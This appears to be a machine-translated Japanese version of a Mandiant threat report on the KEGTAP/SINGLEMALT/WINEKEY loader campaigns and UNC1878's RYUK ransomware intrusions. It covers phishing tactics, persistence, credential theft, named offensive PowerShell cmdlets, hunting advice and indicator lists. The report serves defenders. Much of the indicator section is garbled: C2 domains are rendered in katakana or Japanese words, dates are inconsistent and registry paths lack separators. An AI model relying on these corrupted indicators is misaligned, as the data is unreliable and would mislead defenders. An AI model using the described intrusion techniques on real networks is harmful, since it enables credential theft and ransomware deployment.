Unhappy Hour Special: KEGTAP と SINGLEMALT とランサムウェア チェイサー

Email containing internal references to target an organization’s name news

2020 年を通じて、 ランサムウェアの活動はますます活発化しており、恐喝を行う前に目的のターゲットにアクセスするための、別個でありながら相互に有効化する操作のエコシステムに依存しています。 Mandiant Threat Intelligence は、ランサムウェアの侵害後の展開につながるいくつかのローダーおよびバックドア キャンペーンを追跡してきました。これらのキャンペーンを効果的かつ迅速に検出することが、この脅威を軽減するための鍵となります。

Mandiant がインテリジェンス サブスクライバーに以前に報告したこれらの攻撃を可能にするマルウェア ファミリには、KEGTAP/BEERBOT、SINGLEMALT/STILLBOT、および WINEKEY/CORKBOT が含まれます。これらのマルウェア ファミリは、同じコマンド アンド コントロール インフラストラクチャ (C2) と通信し、ほぼ同等の機能を備えていますが、コードの重複は最小限に抑えられています。他のセキュリティ研究者は、これらのマルウェア ファミリを BazarLoader およびBazarBackdoorまたはTeam9という名前で追跡しています。

これらのキャンペーンを実施しているオペレーターは、世界的な健康危機の最中であっても、病院、退職者コミュニティ、および医療センターを積極的に標的にしており、人命を明らかに軽視していることを示しています.

メール キャンペーンの TTP

KEGTAP、SINGLEMALT、および WINEKEY を配布するキャンペーンは、さまざまな配信戦術、技術、手順 (TTP) を使用して、さまざまな業界や地域の組織の個人に送信されています。これらのキャンペーンでは頻繁に変化が見られますが、最近の活動では以下の点が一貫しています。

  • 電子メールには、攻撃者が制御する Google ドキュメント ドキュメント (通常は PDF ファイル) へのインライン リンクが含まれています。
  • このドキュメントには、マルウェア ペイロードをホストする URL へのインライン リンクが含まれています。
  • 電子メールは、苦情、解雇、賞与、契約、勤務スケジュール、調査、または営業時間に関する問い合わせに関連するように細工された文書や電話、または電子メールに関するフォローアップを含む、一般的な企業通信を装います。
  • 一部の電子メール通信では、件名や電子メール本文に受信者の名前または雇用主の名前が含まれています。

この均一性にもかかわらず、関連する TTP は、キャンペーン間および同じ日に確認された複数のスパム実行間で定期的に変更されています。これらのキャンペーンが時間の経過とともに変化した注目すべき方法は次のとおりです。

  • 初期のキャンペーンは Sendgrid 経由で配信され、攻撃者が作成した Google ドキュメントにユーザーをリダイレクトする Sendgrid URL へのインライン リンクが含まれていました。対照的に、最近のキャンペーンは、攻撃者が制御した、または侵害された電子メール インフラストラクチャを介して配信されており、攻撃者が作成した Google ドキュメントへのインライン リンクが一般的に含まれていますが、Constant Contact サービスに関連付けられたリンクも使用されています。
  • これらのインライン リンクによって読み込まれるドキュメントは、電子メール キャンペーンのテーマにある程度関連するように細工されており、追加のリンクと、ユーザーがクリックするように指示する指示が含まれています。これらのリンクをクリックすると、ファイル名がドキュメント ファイルになりすましたマルウェア バイナリがダウンロードされます。以前のキャンペーンでは、これらのマルウェア バイナリは侵害されたインフラストラクチャでホストされていましたが、攻撃者は、Google ドライブ、Basecamp、Slack、Trello、Yougile、JetBrains などの正規の Web サービスでマルウェアをホストするようになりました。
  • 最近のキャンペーンでは、マルウェア ペイロードは、これらの正当なサービスの 1 つまたは複数に関連付けられた多数の URL でホストされています。ペイロードが削除された場合、攻撃者は Google ドキュメントを更新して、新しい有効なリンクを含めることがあります。
  • 一部のキャンペーンには、受信者の組織への内部参照を含む電子メール (図 1) や、Google ドキュメント ドキュメントに埋め込まれた組織のロゴ (図 2) など、カスタマイズが組み込まれています。
Email containing internal references to target an organization’s name
図 1: 組織名を標的とする内部参照を含む電子メール
対象組織のロゴを含む Google Docs PDF ドキュメント
図 2: 対象組織のロゴを含む Google ドキュメントの PDF ドキュメント

最終的なペイロードを複数のリンクの背後に隠すことは、一部の電子メール フィルタリング テクノロジを回避するための簡単で効果的な方法です。さまざまなテクノロジには、メール内のリンクをたどってマルウェアや悪意のあるドメインを特定しようとする機能があります。ただし、たどるリンクの数はさまざまです。さらに、PDF ドキュメント内にリンクを埋め込むと、自動検出とリンク追跡がさらに困難になります。

侵害後の TTP

これらのキャンペーンから得られたアクセスがさまざまなオペレーターに提供されて収益化される可能性があることを考えると、展開されたランサムウェア ファミリを含む後期の TTP は、侵入ごとに異なる可能性があります。 Mandiant がこれらの侵害後の TTP を可視化した大部分のケースは、RYUK ランサムウェアの展開を介してネットワーク アクセスを収益化する金銭目的の攻撃者である UNC1878 によるものです。

足場を固める

最初の被害者ホストでローダーとバックドアが実行されると、攻撃者はこの最初のバックドアを使用して POWERTRICK および/または Cobalt Strike BEACON ペイロードをダウンロードし、足がかりを確立します。特に、それぞれのローダーとバックドア、および POWERTRICK は、通常、観察されたインシデントで少数のホストにインストールされており、これらのペイロードが足場を確立し、最初のネットワークとホストの偵察を実行するために予約されている可能性があることを示唆しています。ただし、BEACON は多数のホストで頻繁に検出され、攻撃ライフサイクルのさまざまな段階で使用されます。

プレゼンスを維持する

各侵入の予備段階を超えて、これらの攻撃者が最初の足場を確立した後、またはネットワーク内で横方向に移動した後、どのように存在を維持しているかに変化が見られました。 Cobalt Strike、Metasploit、EMPIRE などの一般的なエクスプロイト後のフレームワークの使用に加えて、TrickBot の背後にいるアクターの制御下にあると考えられる ANCHOR などの他のバックドアの使用も確認しています。

  • このアクティビティに関連付けられたローダーは、スケジュールされたタスクの作成、スタートアップ フォルダーへのショートカットとしての自身の追加、/setnotifycmdline を使用したスケジュールされた Microsoft BITS ジョブの作成、および次のレジストリ キーの下の Userinit 値:
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon.
  • 攻撃者は、最初の侵害に続いて、POWERTRICK、Metasploit Meterpreter、および Cobalt Strike BEACON ペイロードをダウンロードしました。 BEACON ペイロードは通常、被害者のネットワーク内の新しいホストに横方向に移動した後に実行されます。攻撃者は、被害者の環境の重要なシステムでスケジュールされたタスクを介して再起動することで永続性を維持するように細工された Cobalt Strike ペイロードを採用しています。特に、BEACON は、これらのインシデントで最も頻繁に観察されたバックドアです。
  • 攻撃者がエンコードされた PowerShell コマンドを実行し、最終的に PowerShell EMPIRE バックドアのインスタンスを実行したことを確認しました。
  • 攻撃者は、BEACON を使用してPowerLurk のRegister-MaliciousWmiEvent コマンドレットを実行し、タスク マネージャー、WireShark、TCPView、ProcDump、Process Explorer、Process Monitor、NetStat、PSLoggedOn、LogonSessions などのセキュリティ ツールおよびユーティリティに関連するプロセスを強制終了するために使用される WMI イベントを登録することが観察されました。 Process Hacker、Autoruns、AutorunsSC、RegEdit、および RegShot。
  • 少なくとも 1 回は、攻撃者が盗んだ認証情報を使用して被害者の環境へのアクセスを維持し、単一要素認証のみを要求するように構成された企業の VPN インフラストラクチャにアクセスしました。

権限の昇格

これらのインシデントで権限をエスカレートする最も一般的な方法には、有効な資格情報の使用が含まれていました。攻撃者は、さまざまな手法を使用して、メモリまたはディスクに保存されている資格情報にアクセスし、特権アカウントにアクセスしました。

  • 攻撃者は、MimiKatz の亜種を使用して取得した有効な認証情報を使用して、権限を昇格させました。私たちは、Mimikatz が被害ホストのファイル システムから実行されることと、Cobalt Strike BEACON を介して実行される PowerShell コマンドレットを介して実行されることを確認しました。
  • 攻撃者は、ドメイン コントローラーからntds.dit Active Directory データベースと SYSTEM および SECURITY レジストリ ハイブのエクスポートされたコピーを介して資格情報にアクセスできます。
  • 複数のインスタンスで、攻撃者は RUBEUS、MimiKatz Kerberos モジュール、および Invoke-Kerberoast コマンドレットの使用を含む、Kerberos に対する攻撃を開始しました。

偵察

これらのインシデント全体でホストとネットワークの偵察を実行するために採用されたアプローチはさまざまでした。ただし、観察された偵察活動の大部分は、BLOODHOUND、SHARPHOUND、ADFind などの公開ユーティリティを使用したアクティビティ ディレクトリの列挙と、Cobalt Strike BEACON を使用した PowerShell コマンドレットの実行を中心に展開されています。

  • BEACON は、これらの侵入全体で多数のシステムにインストールされており、組み込みのホスト コマンドと PowerShell コマンドレットの両方を含むさまざまな偵察コマンドを実行するために使用されています。観測された PowerShell コマンドレットには、次のものが含まれます。
    • 取得-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • 呼び出し-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant は、攻撃者が POWERTRICK を使用して、最初の被害者ホストで組み込みのシステム コマンド ( ipconfigfindstr 、およびcmd.exe など) を実行することを観察しました。
  • 攻撃者は、公開されているユーティリティ Adfind、BLOODHOUND、SHARPHOUND、および KERBRUTE を被害者のネットワークで利用して、Active Directory の情報と資格情報を収集しました。
  • WMIC コマンドは、インストールされているソフトウェアの一覧表示、実行中のプロセスの一覧表示、オペレーティング システムとシステム アーキテクチャの識別など、ホストの偵察を実行するために使用されています。
  • 攻撃者はバッチ スクリプトを使用して、Active Directory の列挙中に特定されたすべてのサーバーに ping を実行し、結果をres.txtに出力しました。
  • 攻撃者は、 Nltestコマンドを使用してドメイン コントローラを一覧表示しました。

横移動

ラテラル ムーブメントは、有効な資格情報を Cobalt Strike BEACON、RDP、および SMB と組み合わせて使用するか、被害者のネットワークに足場を築くために使用されたのと同じバックドアを使用して行われることが最も一般的でした。

  • 攻撃者は定期的に Cobalt Strike BEACON と Metasploit Meterpreter を利用して、被害者の環境内を横方向に移動しています。
  • 攻撃者は通常、侵害されたアカウント (通常のユーザーに属するアカウントと管理者権限を持つアカウントの両方) を使用して、被害者の環境内を横方向に移動しました。一般的なポストエクスプロイト フレームワークの使用に加えて、WMIC コマンドと Windows RDP および SMB プロトコルを使用してラテラル ムーブメントも実現されています。
  • 攻撃者は、Windows のnet useコマンドを使用して Windows 管理共有に接続し、横方向に移動しました。

ミッションを完了する

Mandiant は、侵害後の RYUK ランサムウェアの展開を含む、KEGTAP に関連するインシデントを直接認識しています。また、同じアクターに関連付けられた別のバックドアである ANCHOR 感染が、CONTI または MAZE の展開に先立って発生した事例も観察されています。

  • 少なくとも 1 つのケースで、SFTP を介して攻撃者が制御するサーバーにファイルを流出させるように設計された実行可能ファイルが確認されました。
  • 攻撃者は Cobalt Strike BEACON を使用して、ネットワーク偵察活動を通じて作成されたデータとユーザー ファイルを盗み出しました。
  • 攻撃者は、侵害の痕跡を取り除こうとして、被害者のホストからツールを削除しているのが観察されました。
  • 攻撃者は、被害者のネットワークへのアクセスを利用して、ランサムウェア ペイロードを展開しました。 RYUK ランサムウェアが PsExec を介して展開された可能性が高いことを示唆する証拠がありますが、配布プロセスに関連する他のスクリプトやアーティファクトはフォレンジック分析に利用できませんでした。

狩猟戦略

組織が、KEGTAP または類似のマルウェア ファミリのインスタンスであると考えられるアクティブな感染を持つホストを特定した場合、次の封じ込め措置が推奨されます。この侵入活動は速度が速いため、これらのアクションは並行して実行する必要があることに注意してください。

  • 影響を受けるシステムを特定してフォレンジック レビューを実行します。
  • 影響を受けるデバイスを所有するユーザーへの受信メールを確認して、配布キャンペーンに一致するメールを確認し、すべてのメールボックスからメッセージを削除するための措置を講じます。
  • フィッシング キャンペーンで使用された URL を特定し、プロキシまたはネットワーク セキュリティ デバイスを使用してそれらをブロックします。
  • マルウェアの実行に関連するすべてのユーザー アカウントの資格情報をリセットします。
  • 影響を受けるシステムからのラテラル ムーブメント認証について、企業全体のレビューを実行します。
  • 存在する可能性のある単一要素のリモート アクセス ソリューション (VPN、VDI など) からの認証ログを確認し、できるだけ早く多要素認証 (MFA) に移行します。

第 1 段階のマルウェアの実行に関連するホストベースのアーティファクトと、このアクティビティに関連するすべての侵入後のアクティビティを特定するために、企業全体の取り組みを行う必要があります。これに対するいくつかのベースライン アプローチは、次のように取り込まれています。

KEGTAP ローダーに関連するアクティビティは、多くの場合、HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon レジストリ キーの下にあるシステム スタートアップ フォルダーと Userinit 値を確認することで特定できます。

%APPDATA%MicrosoftWindowsStart MenuProgramsStartupadobe.lnk

図 3: システムのスタートアップ フォルダー内の KEGTAP 永続性に関連付けられた LNK ファイルの例

SINGLEMALT は、BITS を使用して再起動後も永続性を維持します。多くの場合、異常な BITS ジョブを確認することで特定できます。 SINGLEMALT は、存在しない URL をダウンロードするジョブを意図的に作成する、十分に文書化された BITS 永続化メカニズムを使用します。これにより、障害イベントがトリガーされます。ジョブは一定の間隔で再試行するように設定されているため、マルウェアは引き続き実行されます。ホストで BITS ジョブを確認するには、コマンドbitsadmin /listを実行します。

  • 表示名は、「Adobe Update」、「System autoupdate」、またはその他の一般的な値です。
  • 通知状態が失敗 (ステータス 2) に設定されている可能性があります。
  • FileList URL 値が、ローカル ホストまたは存在しない URL に設定されている可能性があります。
  • Notification Command Line の値には、SINGLEMALT サンプルへのパスや、サンプルを新しい場所に移動してから開始するコマンドが含まれている場合があります。
  • Retry Delay の値が設定されます。

WINEKEY は、レジストリの RUN キーを使用して再起動しても持続性を維持します。企業全体で異常な RUN キーを検索すると、このマルウェアの影響を受けるシステムを特定するのに役立ちます。

キー: HKCUSoftwareMicrosoftWindowsCurrentVersionRunBackup Mgr

値: バックドアへのパス

図 4: WINEKEY が永続性を維持するために使用するレジストリ RUN キーの例

ANCHOR バックドアは、このアクティビティに関連する侵入のサブセットで確認されており、多くの場合、再起動による持続性を維持するために使用するスケジュールされたタスクを介して特定できます。 ANCHOR によって作成されたスケジュールされたタスクは、多くの場合、名前が付けられていませんが、常にそうであるとは限りません。

  • ANCHOR 永続性に関連付けられた名前付きのスケジュールされたタスクの識別は、次のパターンに従って構築できます
  • 名前のないスケジュールされたすべてのタスク、特に作成日が侵害の疑いのある時間と一致するタスクを確認する必要があります。

これは忠実度の低い指標ですが、ANCHOR アクティビティは、次のパターンに一致するファイル名を持つ C:WindowsSysWOW64 ディレクトリ内のバイナリを検索することによって特定される場合もあります: < 8 個のランダムな小文字>.exe。 C:WindowsSysWOW64 ディレクトリ内のファイル作成タイムスタンプを積み重ねたり並べ替えたりすることも、悪意のあるファイルを特定するのに役立つ場合があります。これは、ディレクトリがほとんど静的であるためです。

これらのキャンペーンに続くランサムウェアの展開に関連するエクスプロイト後の活動は、通常、Cobalt Strike 攻撃フレームワークを使用して行われます。 Cobalt Strike に関連付けられた BEACON ペイロードは、多くの場合、既存の登録済みサービスとサービス作成イベント (イベント ID 7045) を確認することで識別できます。これらは両方とも、永続性を維持するために最も一般的に採用されているメカニズムのマーカーです。

以下は、関連する活動を特定するのに役立つ可能性がある追加の戦略です。

  • 組織は、Web プロキシ ログを確認して、Google ドキュメント ドキュメントからのリファラーを使用して、ファイル ストレージ、プロジェクト管理、コラボレーション、または通信サービスに対する HXXP 要求を特定できます。
  • 関連する侵害後の活動中に、攻撃者は通常、ツールとデータを PerfLogs ディレクトリと C$ 共有にステージングしました。
  • 後の段階の操作を可能にするために使用されるデータを収集している間、攻撃者は通常、影響を受けるシステムに ntds.dit のインスタンスと、SYSTEM および SECURITY レジストリ ハイブのエクスポートを残します。

強化戦略

アクターが権限をエスカレートし、環境内を横方向に移動するために実行するアクションは、十分に文書化された手法を使用して、ネットワークと Active Directory を検索し、資格情報とシステムを悪用のために公開する一般的な構成ミスを探します。組織は、これらの手法の影響と有効性を制限するための措置を講じることができます。詳細な推奨事項については、 ランサムウェア保護に関するホワイト ペーパーを参照してください。

  • ブルート フォース攻撃やパスワード推測攻撃に対してサービス アカウントを強化します。ほとんどの組織には、パスワードが無期限に設定されたサービス アカウントが少なくともいくつかあります。これらのパスワードはおそらく古く、安全ではありません。できるだけ多くのアカウントを長くて複雑なパスワードにリセットするよう最善を尽くしてください。可能であれば、自動ローテーションのために MSA および gMSAS に移行します。
  • ラテラル ムーブメントに特権アカウントを使用しないようにします。 GPO を使用して、ドメイン管理者や特権サービス アカウントなどの特権アカウントが RDP 接続とネットワーク ログインを開始できないように制限します。潜在的なアカウントの数を制限することで、検出の機会と攻撃者を遅らせる機会を提供します。
  • 可能な場合、サーバーのインターネット アクセスをブロックします。多くの場合、サーバー、特に AD インフラストラクチャ システムがインターネットにアクセスするビジネス ニーズはありません。攻撃者は、BEACON などのエクスプロイト後のツールを展開するために、アップタイムの高いサーバーを選択することがよくあります。
  • Web プロキシまたは DNS フィルターを使用して、未分類の新規登録ドメインをブロックします。多くの場合、フィッシングによって配信される最終的なペイロードは、ビジネスの分類を持たない侵害されたサードパーティの Web サイトでホストされます。
  • 重要なパッチが Windows システムとネットワーク インフラストラクチャにインストールされていることを確認します。攻撃者が、Zerologon (CVE-2020-1472) などのよく知られた脆弱性を悪用して、ランサムウェアを展開する前に環境内の権限をエスカレートすることを確認しています。 UNC1878 とは無関係の可能性がある他のケースでは、攻撃者がランサムウェアを展開する前に、脆弱な VPN インフラストラクチャを介して環境にアクセスすることを確認しています。

ランサムウェアやその他の脅威に関するインテリジェンスの詳細については、当社の脅威インテリジェンス プラットフォームの無料バージョンであるMandiant Advantage Freeに登録してください。この脅威に関する追加情報については、State of the Hack のこのエピソードをご覧ください。

キャンペーン指標

サンプルメールの件名/パターン

  • <(first|last)-name>: 重要な情報
  • <会社名>
  • <会社名> の苦情
  • <(名|姓)-名前>
  • <(名|姓)-名前>
  • 契約解除メッセージ
  • 契約解除のお知らせ
  • 契約解除通知
  • 契約解除のリマインダー
  • 契約停止メッセージ
  • 契約停止のお知らせ
  • 契約停止のお知らせ
  • 契約一時停止のリマインダー
  • 手配キャンセルメッセージ
  • 手配中止のお知らせ
  • 手配キャンセル通知
  • 手配キャンセルのリマインダー
  • 手配停止メッセージ
  • 手配休止のお知らせ
  • 手配停止届
  • 手配中止のお知らせ
  • 契約解除メッセージ
  • 契約解除のお知らせ
  • 契約解除届
  • 契約解除のリマインダー
  • 契約停止メッセージ
  • 契約停止のお知らせ
  • 契約停止届
  • 契約停止のリマインダー
  • 引き落とし確認
  • FW: <名前> 年次ボーナス レポートの準備ができました
  • FW: 緊急: <会社名>: 顧客からの苦情依頼 – 迅速な対応が必要
  • RE: <(名|姓)-名前>
  • RE: <(first|last)-name>: 10 月の給与明細
  • RE: <会社名> – 私の訪問
  • RE: <会社名> 従業員アンケート
  • RE: <会社名> オフィス
  • RE: <Name> さんの苦情について
  • RE: <名前> ボーナス
  • RE: <名前> 終了リスト
  • RE: <名前>
  • RE: <会社名> オフィス
  • RE: <(名|姓)-名前>
  • RE: <(first|last)-name> <(first|last)-name>: 苦情
  • RE: <(first|last)-name>: 召喚状
  • RE: <(名|姓)-名前>
  • RE: <(first|last)-name>: 9 月の給与明細
  • RE: 苦情について
  • RE: 採用されたファイラー フォーム
  • RE: 営業時間の調整
  • RE: 営業時間変更のお知らせ
  • RE: 営業時間変更のお知らせ
  • RE: 営業時間変更のお知らせ
  • RE: 営業日程調整
  • RE: 営業日程調整のお知らせ
  • RE: 営業日程変更のお知らせ
  • RE: 事業スケジュールの再構築
  • RE: 電話して
  • RE: 変更
  • RE: 苦情
  • RE: <会社名> の苦情。
  • RE: <名前> に関する苦情
  • RE: お客様のリクエスト
  • RE: 引き落とし確認
  • RE: ドキュメントのコピー
  • RE: ドキュメント一覧
  • RE: エドガー ファイラー フォーム リノベーション
  • RE: 従業員のボーナス
  • RE: Filer Forms の適応
  • RE: 私の電話
  • RE: 新しいファイラー フォーム タイプ
  • RE: オフィス
  • RE: 私たちの出会い
  • RE: 給与台帳
  • RE: レポートの確認
  • RE: 状況
  • RE: 召喚状
  • RE: 終了
  • RE: 午後2時まで
  • RE: 緊急の <会社名> 従業員の社内調査
  • RE: 訪問
  • RE: ご意見は?
  • RE: 何時ですか?
  • RE: なぜ
  • RE: なぜこのデビット
  • RE: 勤務スケジュール調整
  • RE: 勤務スケジュールの再調整
  • RE: 勤務スケジュールの再調整
  • RE: 勤務スケジュールの再構築
  • RE: 9 月の給与明細

マルウェア ファミリ MD5 の例

  • KEGTAP
    • df00d1192451268c31c1f8568d1ff472
  • ビアボット
    • 6c6a2bfa5846fab374b2b97e65095ec9
  • シングルモルト
    • 37aa5690094cb6d638d0f13851be4246
  • スティルボット
    • 3176c4a2755ae00f4fffe079608c7b25
  • ワインキー
    • 9301564bdd572b0773f105287d8837c4
  • コルクボット
    • 0796f1c1ea0a142fc1eb7109a44c86cb

コード署名証明書の CN

  • ARTBUD ラドム SP ZOO
  • BESPOKE SOFTWARE SOLUTIONS LIMITED
  • ベスト ファッド、OOO
  • ブルーマーブル社
  • チューFSP、LLC
  • 会社 メガコム SP ZOO
  • エステラ、オー
  • エクソンレンタルSP ZOO
  • 月山合同会社
  • GLOBAL PARK HORIZON SP ZOO
  • 無限プログラミング限定
  • ジェームズ LTH ドゥー
  • ロジカ OOO
  • マダスドゥー
  • マスタープラス SP ZOO
  • ニードコード SP ZOO
  • ノードコッド LLC
  • NOSOV SP ZOO
  • OOO MEP
  • 株式会社プラン
  • 地域観光LLC
  • RESURS-RM OOO
  • リタリット LLC
  • ルミコン合同会社
  • SNAB-RESURS、OOO
  • タラットドゥー
  • テス ロジスティカ ドゥー
  • ヴァス株式会社
  • VB コーポレート PTY。株式会社。
  • VITA-DEドゥー

UNC1878 インジケーター

これらのキャンペーンに関連する侵害後の活動の大部分は、Mandiant が UNC1878 として追跡している脅威グループによる RYUK ランサムウェアの配布に関係しています。そのため、このグループに関連する指標をリリースしています。

ビーコン C2

初見

ドメイン

12/11/19

updatemanager[.]us

12/20/19

cmdupdatewin[.]com

12/26/19

scrservallinst[.]情報

2020/1/10

winsystemupdate[.]com

1/11/20

ジョマンバ[.]ベスト

2020/1/13

updatewinlsass[.]com

2020/1/16

winsysteminfo[.]com

2020/1/20

livecheckpointsrs[.]com

2020/1/21

ciscocheckapi[.]com

2020/1/28

タイムシフト[.]com

2020/1/29

サイレンスプロテクト[.]com

2020/1/30

sophosdefence[.]com

2020/1/30

タスクスケジュールwin[.]com

2020/1/30

winddefenceinfo[.]com

2020/1/30

lsasswininfo[.]com

2020/1/30

update-wind[.]com

2020/1/30

lsassupdate[.]com

2020/1/30

renovatesystem[.]com

2020/1/31

updatewinsoftr[.]com

2020/2/2

cleardefencewin[.]com

2020/2/2

checkwinupdate[.]com

2020/2/2

havesetup[.]net

2020/2/3

update-wins[.]com

2020/2/3

conhostservice[.]com

2020/2/4

microsoftupdateswin[.]com

2020/2/4

iexploreservice[.]com

2020/2/12

avrenew[.]com

2020/2/12

ターゲット サポート[.]オンライン

2020/2/12

ウェブ分析[.]ライブ

2020/2/14

freeallsafe[.]com

2020/2/17

windefens[.]com

2020/2/17

defenswin[.]com

2020/2/17

easytus[.]com

2020/2/17

グレートタス[.]com

2020/2/17

livetus[.]com

2020/2/17

comssite[.]com

2020/2/17

findtus[.]com

2020/2/17

bigtus[.]com

2020/2/17

aatus[.]com

2020/2/17

besttus[.]com

2020/2/17

firsttus[.]com

2020/2/17

worldtus[.]com

2020/2/26

freeoldsafe[.]com

2020/2/26

サービスアップデート[.]ネット

2020/2/26

topserviceupdater[.]com

2020/2/27

myserviceupdater[.]com

2020/2/29

myservicebooster[.]net

2020/2/29

servicesbooster[.]org

2020/2/29

ブレインシャンピオン[.]com

2020/2/29

myservicebooster[.]com

2020/2/29

topservicesbooster[.]com

2020/2/29

servicesbooster[.]com

2020/2/29

topservicesecurity[.]org

2020/2/29

トップサービスセキュリティ[.]ネット

2020/2/29

topsecurityservice[.]net

2020/2/29

myyserviceupdater[.]com

2020/2/29

topservicesupdate[.]com

2020/2/29

topservicesecurity[.]com

2020/2/29

サービスセキュリティ[.]組織

2020/2/29

myserviceconnect[.]net

2020/3/2

topservicesupdates[.]com

2020/3/2

yoursuperservice[.]com

2020/3/2

topservicehelper[.]com

2020/3/2

serviceuphelper[.]com

2020/3/2

serviceshelpers[.]com

2020/3/2

ブーストセキュリティ[.]com

2020/3/3

彼は私を悩ませなかった[.]com

2020/3/8

サービスアップデーター[.]com

2020/3/9

secondserviceupdater[.]com

2020/3/9

12thserviceupdater[.]com

2020/3/9

20thservicehelper[.]com

2020/3/9

twelfthservicehelper[.]com

2020/3/9

tenthservicehelper[.]com

2020/3/9

thirdserviceupdater[.]com

2020/3/9

thirdservicehelper[.]com

2020/3/9

tenthserviceupdater[.]com

2020/3/9

13thservicehelper[.]com

2020/3/9

Seventeenthservicehelper[.]com

2020/3/9

sixteenthservicehelper[.]com

2020/3/9

sixservicehelper[.]com

2020/3/9

セブンスサービスヘルパー[.]com

2020/3/9

セブンスサービスアップデーター[.]com

2020/3/9

sixserviceupdater[.]com

2020/3/9

secondservicehelper[.]com

2020/3/9

ninthservicehelper[.]com

2020/3/9

ninethserviceupdater[.]com

2020/3/9

fourteenthservicehelper[.]com

2020/3/9

fourserviceupdater[.]com

2020/3/9

firstserviceupdater[.]com

2020/3/9

firstservicehelper[.]com

2020/3/9

フィフスサービスアップデーター[.]com

2020/3/9

11thserviceupdater[.]com

2020/3/9

5番目のサービスヘルパー[.]com

2020/3/9

fourservicehelper[.]com

2020/3/9

8thservicehelper[.]com

2020/3/9

18thservicehelper[.]com

2020/3/9

8thserviceupdater[.]com

2020/3/9

fifteenthservicehelper[.]com

2020/3/9

19thservicehelper[.]com

2020/3/9

11thservicehelper[.]com

2020/3/14

thirdservice-developer[.]com

2020/3/14

5番目のサービス開発者[.]com

2020/3/15

firstservice-developer[.]com

2020/3/16

fourservice-developer[.]com

2020/3/16

ninethservice-developer[.]com

2020/3/16

Seventhservice-developer[.]com

2020/3/16

secondservice-developer[.]com

2020/3/16

sixservice-developer[.]com

2020/3/16

tenthservice-developer[.]com

2020/3/16

eithtservice-developer[.]com

2020/3/17

servicedupdater[.]com

2020/3/17

サービスアップデータ[.]com

2020/3/19

セクシーサービス[.]com

2020/3/19

serviceboostnumberone[.]com

2020/3/19

servicedbooster[.]com

2020/3/19

サービスハンター[.]com

2020/3/19

servicedhunter[.]com

2020/3/19

servicedpower[.]com

2020/3/19

sexycservice[.]com

2020/3/23

yourserviceupdater[.]com

2020/3/23

top-serviceupdater[.]com

2020/3/23

トップサービスブースター[.]com

2020/3/23

serviceshelps[.]com

2020/3/23

servicemonsterr[.]com

2020/3/23

servicehunterr[.]com

2020/3/23

service-helpes[.]com

2020/3/23

servicecheckerr[.]com

2020/3/23

newservicehelper [.] com

2020/3/23

ハンターサービス[.]com

2020/3/23

helpforyourservice[.]com

2020/3/23

boostyourservice[.]com

2020/3/26

開発マスターズ[.]com

2020/3/26

アクションハンター[.]com

2020/5/4

info-develop[.]com

2020/4/5

ayechecker[.]com

2020/5/4

サービスブースター[.]com

2020/9/18

行[.]com

2020/9/22

gtrsqer[.]com

2020/9/22

挑戦[.]com

2020/9/22

chaonymes[.]com

2020/9/22

noman[.]com

2020/9/22

getinformationss[.]com

2020/9/22

nomadfunclub[.]com

2020/9/22

harddagger[.]com

2020/9/22

errvghu[.]com

2020/9/22

regins[.]com

2020/9/22

gameleader[.]com

2020/9/22

カミソリ[.]com

2020/9/22

vnuret[.]com

2020/9/22

regbed[.]com

2020/9/22

ブース[.]com

2020/9/23

ayiyas[.]com

2020/9/23

サービスワーク[.]ネット

2020/9/23

moonshardd[.]com

2020/9/23

ラッシュポッター[.]com

2020/9/23

biliyilish[.]com

2020/9/23

ブラックホール[.]com

2020/9/23

checkhunterr[.]com

2020/9/23

ダガークリップ[.]com

2020/9/23

check4list[.]com

2020 年 9 月 24 日

トーク[.]コム

2020/9/29

ハングリーベイビー[.]com

2020/9/30

marahzz[.]com

10/1/20

josonsbabyy[.]com

10/1/20

wondergodst[.]com

2020/1/10

zetrex[.]com

2020/1/10

tiancaii[.]com

2020/1/10

cantliee[.]com

10/1/20

リアルゲームス[.]com

2020/1/10

多分ベイビー[.]com

10/1/20

saynoforbubble[.]com

10/1/20

チェキングキング[.]コム

2020/1/10

ラピラサ[.]com

2020/1/10

レイドボッサ[.]com

10/1/20

mountasd[.]com

10/1/20

puckhunterrr[.]com

2020/1/10

pudgee[.]com

10/1/20

lockfinderrs[.]com

2020/1/10

リンダック[.]com

10/1/20

bithunterr[.]com

2020/1/10

voiddas[.]com

2020/1/10

シバルサキエ[.]com

10/1/20

Giveasees[.]com

10/1/20

shabihere[.]com

10/1/20

tarhungangster[.]com

2020/1/10

imagodd[.]com

10/1/20

raaidboss[.]com

10/1/20

sunofgodd[.]com

2020/1/10

rulemonster[.]com

2020/1/10

loxliver[.]com

10/1/20

servicegungster[.]com

10/1/20

kungfupandasa[.]com

2020/2/10

check1domains[.]com

2020/10/5

sweetmonsterr[.]com

5/10/20

qascker[.]com

10/7/20

リモート[.]com

10/7/20

チープショット[.]com

2020/7/10

havemosts[.]com

2020/7/10

unlockwsa[.]com

2020/7/10

アンダーケース[.]com

10/7/20

zameharden[.]com

2020/7/10

mixunderax[.]com

10/7/20

bugsbunnyy[.]com

10/7/20

fastbloodhunter[.]com

10/7/20

serviceboosterr[.]com

10/7/20

servicewikii[.]com

10/7/20

secondlive[.]com

10/7/20

quwasd[.]com

10/7/20

ラッキーハンター[.]com

2020/7/10

wodemaya[.]com

10/7/20

hybriqdjs[.]com

2020/7/10

ガンドラッグ[.]com

10/7/20

ガンガメオン[.]com

10/7/20

servicemount[.]com

10/7/20

servicesupdater[.]com

10/7/20

service-boosterr[.]com

10/7/20

serviceupdate[.]com

2020/7/10

dotmaingame[.]com

10/12/20

backup1service[.]com

10/13/20

bakcup-monster[.]com

10/13/20

bakcup-checker[.]com

10/13/20

バックアップシンプル[.]com

10/13/20

バックアップリーダー[.]com

10/13/20

バックアップヘルパー[.]com

10/13/20

サービスチェッカー[.]com

10/13/20

nasmastrservice[.]com

10/14/20

サービスリーダー[.]com

10/14/20

nas-simple-helper[.]com

10/14/20

nas-leader[.]com

10/14/20

ブーストサービス[.]com

10/14/20

エレファントドライブ[.]com

10/15/20

サービスヘルパー[.]com

10/16/20

トップバックアップヘルパー[.]com

10/16/20

best-nas[.]com

10/16/20

トップバックアップサービス[.]com

10/16/20

ベストサービスヘルパー[.]com

10/16/20

backupnas1[.]com

